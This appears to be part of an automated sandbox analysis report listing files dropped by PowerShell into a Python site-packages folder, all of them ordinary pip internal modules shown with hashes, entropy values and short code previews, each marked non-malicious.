                                                                                                    Preview:........=.Cf`$.............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j0..................e.........Z...e.d.d...........Z...e.d.d.d...........Z.d.a.e.e.....e.d.<...e.d.e.d.....f.d...........Z...G.d...d.........Z d.a!e.e ....e.d.<...e.d.e.e d.d.f.....f.d...........Z"..G.d...d.........Z#..e#........Z$..G.d...d.........Z%..G.d...d.e%........Z&y.)......N)...ExitStack..contextmanager)...Path)...Any..Callable..Dict..Generator..List..Optional..TypeVar..Union)...enum..rmtree.._T..TempDirectory)...boundz.build-envz.ephem-wheel-cachez.req-build)...BUILD_ENV..EPHEM_WHEEL_CACHE..REQ_BUILD.._tempdir_manager..return).NNNc................#....z...K.....t.................5.}.t.........|.c.}.a...d.......|.a...d.d.d...........y.#.|.a.w.x.Y.w.#.1.s.w...Y.....y.x.Y.w...w...N).r....r....)...stack..old_tempdir_managers.... .hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11114
                                                                                                    Entropy (8bit):5.38934956575933
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:zSqzGGvsqe+q1aSq6AjwhikER7GSJsmfr:znzGs3PofLsR7FJxr
                                                                                                    MD5:073B68D20B034E3EE4F62284F0C10970
                                                                                                    SHA1:BBD0E2A6031450404C984842E7A4C31876864E75
                                                                                                    SHA-256:302F8CD0E0C56F2DC962749849148939E40549F11B75E1C0E2B06CC3E4271211
                                                                                                    SHA-512:565D5C110DDBBD603FB83A6F16B8C9C098E8425776A562CC09276E6823CEBDF78DAD92F167055259AA32B49C83F36803B3D893F51FB1303F5E1B2A8471E0671B
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfu"..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.j*..................e.........Z.e.e.z...Z...d.d.l.Z.e.e.z...Z...d.d.l.Z.e.e.z...Z.d.e.f.d...Z.d.e.d.e.e.....f.d...Z d.e.e.....d.e!f.d...Z"d.e.d.e.d.e!f.d...Z#d.e.d.d.f.d...Z$d.e.d.e!f.d...Z%d.d.e.d.e.d.e!d.d.f.d...Z&d.e.d.e.d.d.f.d...Z'..d.d.e.d.e.d.e.e.....d.d.f.d...Z(y.#.e.$.r...e.j7..................d...........Y...w.x.Y.w.#.e.$.r...e.j7..................d...........Y...w.x.Y.w.).z.Utilities related archives.......N)...Iterable..List..Optional)...ZipInfo)...InstallationError)...BZ2_EXTENSIONS..TAR_EXTENSIONS..XZ_EXTENSIONS..ZIP_EXTENSIONS)...ensure_dirz.bz2 module is not availablez.lzma module is not available..returnc.....................Z.....t.........j...................d.........}.t.........j...................|...........|.S.).zBGet the current umask which involves having to set it temporarily.r....)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2411
                                                                                                    Entropy (8bit):5.26167765796761
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:WWgC7VGCo3lARBTyxIHXgrCygFHjyoL8LAzgrt/QgxtNhumw7OgaDsGLzudmqlaP:WSxSGAKXgnKd4/uZtq8mqLI7Sli
                                                                                                    MD5:ED4835A0EB8B7728EB773CB5448E7477
                                                                                                    SHA1:40B3BF2D03155388B4A055DA335CA4AC44FA63D1
                                                                                                    SHA-256:89CC71E5BB3A3A959CFA130D4631ACBC4C9B630129B1B89016AD04BE8E38D208
                                                                                                    SHA-512:C247597C4B0C4CB8173C8090A6DEC9FC6F82527432AB93C8E26CEE05353FF5F62DB9504C6D76368A6D70149361EAE27E196F57B48D0A77A2C4107A704AE95CEA
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................r.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.e.....f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.y.)......N)...Optional.....)...WINDOWS..url..returnc.....................R.....d.|.v.r.y.|.j...................d.d.........d.....j...........................S.).N..:r....r....)...split..lower).r....s.... .dC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/urls.py..get_url_schemer........s+.........#.~.......9.9.S.!....Q.....%..%..'..'.......pathc...........................t.........j...................j...................t.........j...................j...................|.................}.t.........j...................j...................d.t.........j...................j...................|.................}.|.S.).zh. Convert a path to a file: URL. The path will be made absolute and have. quoted path parts.. ..file:)...osr......normpath..abspath..urllib..parse..urljoin..request..pa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4486
                                                                                                    Entropy (8bit):5.306644899609172
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:GnXGpfS/bKTpUJKTaz6f5V/OmILVEod7+CPAUU:GWp6/bSUKLBjox+CPAp
                                                                                                    MD5:A7A148BE9FF0E715C2D10D629AA0C5E8
                                                                                                    SHA1:9EB38EB968325233684746686AE428AEFE1AAE21
                                                                                                    SHA-256:33F5A0B64C1D6755FE5105BCB481B66280CD22CDCFF8DE5B5FE6BA92AE5285E6
                                                                                                    SHA-512:5640C064A45DD9EDC594D7820CE2E59C32CB6184641012DDEDEAD84D44B10EC9EE16657D75FB9F4239FEEA28F729C7AFD35EBEF50FC411E84E18775289EF3741
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.....e.j...................e.........Z...e.j...................d.........Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.e.e.........f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.y.)......N)...List..Optionalz8include-system-site-packages\s*=\s*(?P<value>true|false)..returnc.....................b.....t.........j...................t.........t.........d.t.........j...........................k7..S.).znChecks if sys.base_prefix and sys.prefix match... This handles PEP 405 compliant virtual environments.. ..base_prefix)...sys..prefix..getattr........jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/virtualenv.py.._running_under_venvr........s ...........:.:.....m.S.Z.Z..@..@..@r....c.....................".....t.........t.........d.........S.).zmChecks if sys.real_prefix is set... This handles virtual environments created with pypa's virtualenv.. ..r
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5932
                                                                                                    Entropy (8bit):5.627887269686083
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Iy43rh4T7LQOB2pF/Iof8wVIyGO/ekGgvqwBLfOgE4SfXd:Kl4HLZo/IodP+g5BL7C
                                                                                                    MD5:DFC921D49B41496D1CDAA89E843EE199
                                                                                                    SHA1:028155DC072A88B46B492B8725A7630D4CB52F67
                                                                                                    SHA-256:6BA8484D16FB2E8A60543C16F2C691598E4E1B6A7CE5E9C03D3A72CC3505D736
                                                                                                    SHA-512:AA1ACF5A6C632F970B8720B4336FAC0DEDDC478290A0451FD9A6F09A6DB4A0729B4BA7E851129EF6FE7721681E759BAA7D56D59C9325D5F61A3F4EFCC4ACBD0D
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z...e.j ..................e.........Z.d.e.d.e.d.e.e.e.f.....f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.d.f.....f.d...Z.d.e.e.d.f.....d.e.d.d.f.d...Z.y.).z0Support functions for working with wheel files.......N)...Message)...Parser)...Tuple)...BadZipFile..ZipFile)...canonicalize_name)...UnsupportedWheel)......r......wheel_zip..name..returnc............................t.........|.|.........}.t.........|.|.........}.t.........|.........}.t.........|.|...........|.|.f.S.#.t.........$.r.}.t.........|...d.t.........|.......................d.}.~.w.w.x.Y.w.).z.Extract information from the provided wheel, ensuring it meets basic. standards... Returns the name of the .dist-info directory and the parsed WHEEL metadata.. z. has an invalid wheel, N)...wheel_dist_info_dir..wheel_metadata..wheel_versionr......str..check_comp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3351
                                                                                                    Entropy (8bit):5.085973629003143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JPQNssZQHToNQ7DtrqOMKk6A3TI/sDNzvHHlHm4s3a:yQHT7DtNk6OTIUDNhG4F
                                                                                                    MD5:AE014F7CBAEF31C8B32D369C3C6C3945
                                                                                                    SHA1:B0731381C5AED0A117E812350815008B0AC7623F
                                                                                                    SHA-256:CAF0C67A54D5BA045AC8F68E17693869BD0ACB8777B8E9007EE3908C04A32266
                                                                                                    SHA-512:D88BDAFA5DF9926DA4E9B2F877D48EDE1F04458808886C62CF1635E9488ECBC1905600BD50A62330AC7619327D9A1E152EA7BC00F29A688EBD7B980948E6922D
                                                                                                    Malicious:false
                                                                                                    Preview:"""Functions brought over from jaraco.text...These functions are not supposed to be used within `pip._internal`. These are.helper functions brought over from `jaraco.text` to enable vendoring newer.copies of `pkg_resources` without having to vendor `jaraco.text` and its entire.dependency cone; something that our vendoring setup is not currently capable of.handling...License reproduced from original source below:..Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Softw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1015
                                                                                                    Entropy (8bit):4.829282893843599
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:LbB2D68DIK03Bx2uOmcEYBoclg4I2KzY+3VkQyFyu91n5edNmGtz+LXsvKD2XXz9:Z2uK6/bhYlczV1qGzvvXXhuPs
                                                                                                    MD5:D525AEBD855B84182950CA3E13B6FD7A
                                                                                                    SHA1:2C20B7D739A304F3715AEA6B90EED634C2217C5F
                                                                                                    SHA-256:FA31CB384FD31DA673E4115C0A7A122FD11802D2749D77A6E3DB3DA1FE23BCAC
                                                                                                    SHA-512:46E30C99D22600897809EA272683DAD3251F1938FEA156DD087243C176C6277389B09F544869404BD6E807BB50285A6359B0B2301BE89AB285B175B6F52FE15F
                                                                                                    Malicious:false
                                                                                                    Preview:"""Customize logging..Defines custom logger class for the `logger.verbose(...)` method...init_logging() must be called before any other modules that call logging.getLogger.."""..import logging.from typing import Any, cast..# custom log level for `--verbose` output.# between DEBUG and INFO.VERBOSE = 15...class VerboseLogger(logging.Logger):. """Custom Logger, defining a verbose log-level.. VERBOSE is between INFO and DEBUG.. """.. def verbose(self, msg: str, *args: Any, **kwargs: Any) -> None:. return self.log(VERBOSE, msg, *args, **kwargs)...def getLogger(name: str) -> VerboseLogger:. """logging.getLogger, but ensures our VerboseLogger class is returned""". return cast(VerboseLogger, logging.getLogger(name))...def init_logging() -> None:. """Register our VerboseLogger and VERBOSE log level... Should be called before any calls to getLogger(),. i.e. in pip._internal.__init__. """. logging.setLoggerClass(VerboseLogger). logging.addLevelName(VERBO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1665
                                                                                                    Entropy (8bit):4.720039128708989
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:xnB0TGLm/yMUR2o0vmQhaMf4ugRpS1Y9Ft5Xi:xrmqnRg5IMAugRpoY9F/i
                                                                                                    MD5:C165A5743C1F307CCCD2419071932098
                                                                                                    SHA1:2F7D46108F0818D083EC0FDEF4BEF65AC5977583
                                                                                                    SHA-256:B3081C4CA3A6DDD68B7974D6EAFE41512D938B646F1271914181FFC835E4940A
                                                                                                    SHA-512:855626248CC0F836F31E63FF01E9F4C09C9BD856A9CE160AF776A652EA791073569E773F8A0B57349659F1CE0BA0152112BE5D2CAEFB91D2EFC2DC576C4F8539
                                                                                                    Malicious:false
                                                                                                    Preview:""".This code wraps the vendored appdirs module to so the return values are.compatible for the current pip code base...The intention is to rewrite current usages gradually, keeping the tests pass,.and eventually drop this after all usages are changed.."""..import os.import sys.from typing import List..from pip._vendor import platformdirs as _appdirs...def user_cache_dir(appname: str) -> str:. return _appdirs.user_cache_dir(appname, appauthor=False)...def _macos_user_config_dir(appname: str, roaming: bool = True) -> str:. # Use ~/Application Support/pip, if the directory exists.. path = _appdirs.user_data_dir(appname, appauthor=False, roaming=roaming). if os.path.isdir(path):. return path.. # Use a Linux-like ~/.config/pip, by default.. linux_like_path = "~/.config/". if appname:. linux_like_path = os.path.join(linux_like_path, appname).. return os.path.expanduser(linux_like_path)...def user_config_dir(appname: str, roaming: bool = True) -> str:.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1884
                                                                                                    Entropy (8bit):4.898660610096103
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rqA9ydI6zdCdm9HG5FAY/Lne1MOoToPtIWL6wEv:rFX6zEotG5JyVosPt6Vv
                                                                                                    MD5:AF88D940B9DAABD00B97A3CF427B26E6
                                                                                                    SHA1:29D3D00672CB363BC71BDF0769EC4FE9841AE318
                                                                                                    SHA-256:002C817CB823DFF5C6FA2039A26103AD7A833347102B38BC87C1D10489F31BA4
                                                                                                    SHA-512:6A4B4E2A3037D259C6B388EDEA0E9BB615A6D69BBC4FEFF7B35527CD1740DAE2D99F42E1130813C87E78B2832AEF31634D2F965DD78E9C0CC55F6876424AF5D7
                                                                                                    Malicious:false
                                                                                                    Preview:"""Stuff that differs in different Python versions and platform.distributions."""..import logging.import os.import sys..__all__ = ["get_path_uid", "stdlib_pkgs", "WINDOWS"]...logger = logging.getLogger(__name__)...def has_tls() -> bool:. try:. import _ssl # noqa: F401 # ignore unused.. return True. except ImportError:. pass.. from pip._vendor.urllib3.util import IS_PYOPENSSL.. return IS_PYOPENSSL...def get_path_uid(path: str) -> int:. """. Return path's uid... Does not follow symlinks:. https://github.com/pypa/pip/pull/935#discussion_r5307003.. Placed this function in compat due to differences on AIX and. Jython, that should eventually go away... :raises OSError: When path is a symlink or can't be read.. """. if hasattr(os, "O_NOFOLLOW"):. fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW). file_uid = os.fstat(fd).st_uid. os.close(fd). else: # AIX and Jython. # WARNING: time of check vulnerab
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5377
                                                                                                    Entropy (8bit):4.623716321322792
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:wcBTxRtuL5CUowd1J+GQfP2qJ25Lv+ENJADraBcUchJFoHcmjfXYMXcvrO:HFxDuL5EkjoGqs5pAD2D1H/ADrO
                                                                                                    MD5:964CA22D0609D7722001D792568DAF84
                                                                                                    SHA1:DFBADA13EBA8EF63D4BC33A652ADA480E3E06B42
                                                                                                    SHA-256:C9D8A7F101BC047A9846C3D8E0E2FA7266F8E026EA5E5D53D31C52F7B5611E49
                                                                                                    SHA-512:AA278E6157336DA7DC24A60F7E50376C2BAE4F919B828CBF325457935A26A4CCD9F014B32779D5A98CE4C78B64F85B70FD2D07AA233565AF53D5E0CCC537F837
                                                                                                    Malicious:false
                                                                                                    Preview:"""Generate and work with PEP 425 Compatibility Tags.."""..import re.from typing import List, Optional, Tuple..from pip._vendor.packaging.tags import (. PythonVersion,. Tag,. compatible_tags,. cpython_tags,. generic_tags,. interpreter_name,. interpreter_version,. mac_platforms,.).._osx_arch_pat = re.compile(r"(.+)_(\d+)_(\d+)_(.+)")...def version_info_to_nodot(version_info: Tuple[int, ...]) -> str:. # Only use up to the first two numbers.. return "".join(map(str, version_info[:2]))...def _mac_platforms(arch: str) -> List[str]:. match = _osx_arch_pat.match(arch). if match:. name, major, minor, actual_arch = match.groups(). mac_version = (int(major), int(minor)). arches = [. # Since we have always only checked that the platform starts. # with "macosx", for backwards-compatibility we extract the. # actual prefix provided by the user in case they provided. # something like "macosxcustom_".
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):242
                                                                                                    Entropy (8bit):4.397332469335865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:tj57fw86Cx/McP81xqwXJhA7p8BsjD7QpCJbhy9/oXEcvg:P086CxH8+gW7p8qD0pCJFo/oFY
                                                                                                    MD5:913AB688B48547F157B5D13B3E854813
                                                                                                    SHA1:442DC5866A60DAC7CA2578CD773C147E9E1C063A
                                                                                                    SHA-256:9B6D58DF002D41CFA38BA55E6FA93F33983A034672148E1E81C853767C21FA94
                                                                                                    SHA-512:F927ACA09E61B6DDB212C234727488AD92E4AC77131BB61AA9D9F4527FBA9877A1819B4DF12D7810DAA882C7BA08D8B3E1D041E6AF689210DE905C2F4AFD20AC
                                                                                                    Malicious:false
                                                                                                    Preview:"""For when pip wants to check the date or time.."""..import datetime...def today_is_later_than(year: int, month: int, day: int) -> bool:. today = datetime.date.today(). given = datetime.date(year, month, day).. return today > given.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3627
                                                                                                    Entropy (8bit):4.513871213115879
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zzE7PJcqlskEQsCWMeuOCykDPEuIf2XwB0W:zIjRWnuOl116W
                                                                                                    MD5:816175BFD9D11C2EE8C609B102953156
                                                                                                    SHA1:8C790F62DB12BB362628DB33E4992188A1D893DD
                                                                                                    SHA-256:34AA3C56A2E2A09E279D75C6996E0A75AB3117DD04147919687797D5F4F4F02F
                                                                                                    SHA-512:754C7FB0D46AF13CCA0C05663A2DB9775C8C0A16BE6D8D166F4FA2FA494985A33D22B267D32AC1D267A049CDAE1B3FAF25CBA924641A2B167406EB0A196CAE06
                                                                                                    Malicious:false
                                                                                                    Preview:""".A module that implements tooling to enable easy warnings about deprecations.."""..import logging.import warnings.from typing import Any, Optional, TextIO, Type, Union..from pip._vendor.packaging.version import parse..from pip import __version__ as current_version # NOTE: tests patch this name...DEPRECATION_MSG_PREFIX = "DEPRECATION: "...class PipDeprecationWarning(Warning):. pass..._original_showwarning: Any = None...# Warnings <-> Logging Integration.def _showwarning(. message: Union[Warning, str],. category: Type[Warning],. filename: str,. lineno: int,. file: Optional[TextIO] = None,. line: Optional[str] = None,.) -> None:. if file is not None:. if _original_showwarning is not None:. _original_showwarning(message, category, filename, lineno, file, line). elif issubclass(category, PipDeprecationWarning):. # We use a specially named logger which will handle all of the. # deprecation messages for pip.. logger = loggi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3206
                                                                                                    Entropy (8bit):4.41721615869807
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:jpU715//QnXpoT2/vGwQhFDd5K6gte3baYiOXaoS31oMYS96KDJGY/7T:jpdme6xLiOgFoMF9R4Y/7T
                                                                                                    MD5:3D5E258E0C3E2552C1BA4254BA2CC40B
                                                                                                    SHA1:DD92E884DF95195217318DB385B1DBD399D50D0C
                                                                                                    SHA-256:E85D6D736ADC29A0999A07D5C2C13A39B21EFCFBB1DB799455803ED83F700857
                                                                                                    SHA-512:6D2B54978F0915BB3F8509E29A58624AF1C20BDB288752D5845AB714DDE64C5D06DA0F98FAB93715D2C49C75150E73C88C15AE656480C03356D300206ED35FE6
                                                                                                    Malicious:false
                                                                                                    Preview:from typing import Optional..from pip._internal.models.direct_url import ArchiveInfo, DirectUrl, DirInfo, VcsInfo.from pip._internal.models.link import Link.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs import vcs...def direct_url_as_pep440_direct_reference(direct_url: DirectUrl, name: str) -> str:. """Convert a DirectUrl to a pip requirement string.""". direct_url.validate() # if invalid, this is a pip bug. requirement = name + " @ ". fragments = []. if isinstance(direct_url.info, VcsInfo):. requirement += "{}+{}@{}".format(. direct_url.info.vcs, direct_url.url, direct_url.info.commit_id. ). elif isinstance(direct_url.info, ArchiveInfo):. requirement += direct_url.url. if direct_url.info.hash:. fragments.append(direct_url.info.hash). else:. assert isinstance(direct_url.info, DirInfo). requirement += direct_url.url. if direct_url.subdirectory:. fragments.append("sub
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2463
                                                                                                    Entropy (8bit):4.582459566567463
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:da7JM7wQ1OP1d7wrNSd3O01iXD563sI4dMfqtpCY2MmaLKo9LXIx5u:dl7DONtw+3O8kD568I4dFS+m2XIx5u
                                                                                                    MD5:779E46DB7BBC718A77B123CF76078CE1
                                                                                                    SHA1:7F16CAC0927CDF0A044E03F617A9E94A427B859E
                                                                                                    SHA-256:D0578F6685182AFE11190DADEB1EF0E59E36EF06C0FD4A375999C092B82CBAAA
                                                                                                    SHA-512:A2B7F6CBD31DFA7DF5C014E14BFB7FDB33EE41363E7E4531842C3B6F14DACF60DEECFB4F57346AE2072A48F7A1AFEC88DCFDC6DB1B0BA326E4FEB58F329E9FEA
                                                                                                    Malicious:false
                                                                                                    Preview:import os.import re.import sys.from typing import List, Optional..from pip._internal.locations import site_packages, user_site.from pip._internal.utils.virtualenv import (. running_under_virtualenv,. virtualenv_no_global,.)..__all__ = [. "egg_link_path_from_sys_path",. "egg_link_path_from_location",.]...def _egg_link_names(raw_name: str) -> List[str]:. """. Convert a Name metadata value to a .egg-link name, by applying. the same substitution as pkg_resources's safe_name function.. Note: we cannot use canonicalize_name because it has a different logic... We also look for the raw name (without normalization) as setuptools 69 changed. the way it names .egg-link files (https://github.com/pypa/setuptools/issues/4167).. """. return [. re.sub("[^A-Za-z0-9.]+", "-", raw_name) + ".egg-link",. f"{raw_name}.egg-link",. ]...def egg_link_path_from_sys_path(raw_name: str) -> Optional[str]:. """. Look for a .egg-link file for project name, by
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1169
                                                                                                    Entropy (8bit):5.000664368044061
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:9dJ6f/5kaXMOvjjmuZF5wSy/WGLiT/RpqwaphPaw/baVY9g4e8+Kv:Hg/5jcOvjjmuN8ejNUjiw/2h47
                                                                                                    MD5:71781AF636DF2088D9C6FA15B8248724
                                                                                                    SHA1:31C2038B64DD5D3DD3C4CF560E354E4471B144A0
                                                                                                    SHA-256:AAAB170ED8B03088D730488855268E8F01F96268AB09A2BE748CDBEBE5C9B0BD
                                                                                                    SHA-512:A6D65005137278C217BDAE67FC2A971B22066DD5D8B307A96C0B40550BAD32E11870DC89411969290D2C3BAABDE8650CE34DC4CE58A0C22438DAB36733A53155
                                                                                                    Malicious:false
                                                                                                    Preview:import codecs.import locale.import re.import sys.from typing import List, Tuple..BOMS: List[Tuple[bytes, str]] = [. (codecs.BOM_UTF8, "utf-8"),. (codecs.BOM_UTF16, "utf-16"),. (codecs.BOM_UTF16_BE, "utf-16-be"),. (codecs.BOM_UTF16_LE, "utf-16-le"),. (codecs.BOM_UTF32, "utf-32"),. (codecs.BOM_UTF32_BE, "utf-32-be"),. (codecs.BOM_UTF32_LE, "utf-32-le"),.]..ENCODING_RE = re.compile(rb"coding[:=]\s*([-\w.]+)")...def auto_decode(data: bytes) -> str:. """Check a bytes string for a BOM to correctly detect the encoding.. Fallback to locale.getpreferredencoding(False) like open() on Python3""". for bom, encoding in BOMS:. if data.startswith(bom):. return data[len(bom) :].decode(encoding). # Lets check the first two lines as in PEP263. for line in data.split(b"\n")[:2]:. if line[0:1] == b"#" and ENCODING_RE.search(line):. result = ENCODING_RE.search(line). assert result is not None. encoding = result.gr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3064
                                                                                                    Entropy (8bit):4.680639595700007
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:TvlkosG2/35jkXM50XK1gFIsSBbn1fUcZya9EvZOWwam3rKZSKtZ9dPr9S9ybIA:TvlkosTKXM5GDFIzZ1fJya9EvZOWwa3h
                                                                                                    MD5:6824909158AACEE9DF77A01C1783AF2E
                                                                                                    SHA1:DF1011DF89A89E8E184B38CF4232CC1B15446CC0
                                                                                                    SHA-256:62584B4D1976A07040BAA85CFB398BED4492EBB4CF5951C89A3780407ADE6534
                                                                                                    SHA-512:6BA7233C1F1EF34F5BF4FCF4FD0A420CADBDCB8A75C32EDC83AAE81C36E7503C569E786F61E03B55B57C6AEE70ED041B7E9FB1D889E18FCD2085AF09A1A727EF
                                                                                                    Malicious:false
                                                                                                    Preview:import itertools.import os.import shutil.import sys.from typing import List, Optional..from pip._internal.cli.main import main.from pip._internal.utils.compat import WINDOWS.._EXECUTABLE_NAMES = [. "pip",. f"pip{sys.version_info.major}",. f"pip{sys.version_info.major}.{sys.version_info.minor}",.].if WINDOWS:. _allowed_extensions = {"", ".exe"}. _EXECUTABLE_NAMES = [. "".join(parts). for parts in itertools.product(_EXECUTABLE_NAMES, _allowed_extensions). ]...def _wrapper(args: Optional[List[str]] = None) -> int:. """Central wrapper for all old entrypoints... Historically pip has had several entrypoints defined. Because of issues. arising from PATH, sys.path, multiple Pythons, their interactions, and most. of them having a pip installed, users suffer every time an entrypoint gets. moved... To alleviate this pain, and provide a mechanism for warning users and. directing them to an appropriate place for help, we now define all of. our
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script text executable Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5122
                                                                                                    Entropy (8bit):4.553153847418192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zVW6uMIojkzH5WrQXbsB4RTN8D+aQuaOAL7hELnDGVv:zVuMTkzZW0XAB4RTN8DcJOAXSL6Vv
                                                                                                    MD5:DEEE0A94B232580C4DAC9C3741A00528
                                                                                                    SHA1:7E4452EE2A28E0E3E10D02D1BA115870E9540E4F
                                                                                                    SHA-256:4613085D468D54C1A3737AE1B036A1590E0C6AFBC440376A5EA82AF85E9FA70F
                                                                                                    SHA-512:A55B030CD406095F34A7772C448901141CD95EC0E9FD04DDB0F42D7DE950BF32DB091353A407EC7E844DDFDFAA25730BBD21D3A7B7AB56D3981AF6E71159BFA3
                                                                                                    Malicious:false
                                                                                                    Preview:import fnmatch.import os.import os.path.import random.import sys.from contextlib import contextmanager.from tempfile import NamedTemporaryFile.from typing import Any, BinaryIO, Generator, List, Union, cast..from pip._vendor.tenacity import retry, stop_after_delay, wait_fixed..from pip._internal.utils.compat import get_path_uid.from pip._internal.utils.misc import format_size...def check_path_owner(path: str) -> bool:. # If we don't have a way to check the effective uid of this process, then. # we'll just assume that we own the directory.. if sys.platform == "win32" or not hasattr(os, "geteuid"):. return True.. assert os.path.isabs(path).. previous = None. while path != previous:. if os.path.lexists(path):. # Check if path is writable by current user.. if os.geteuid() == 0:. # Special handling for root user in order to handle properly. # cases where users use sudo without -H flag.. try:.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):716
                                                                                                    Entropy (8bit):5.128064341013586
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:cELEYBRrGB2BLZYnBLZ3CLaBLZXWYaBLZYKsBnJTeeG8WbJVw57eMF5YooXHv:cFYq2BmnBU2BBWYaBmT7yeG8WbJOF5ni
                                                                                                    MD5:DAAE55F86E9BAE3D0AFFC1181F6ACD85
                                                                                                    SHA1:B75E13EF5D44699F0AF4AE12882321E63045B936
                                                                                                    SHA-256:8BC5C04347850A8836E85C3DC95D186F5CA002A298075C3D0B3F67D1F8FC8195
                                                                                                    SHA-512:AFEDC5779F8E90FCF5840FFE49E7916971AA461B6056FB434078018518AFFFE834C9BD6A9DCE10D886361B1340807E09B7CD47F8D51C9FA8183C3EB759B59ABC
                                                                                                    Malicious:false
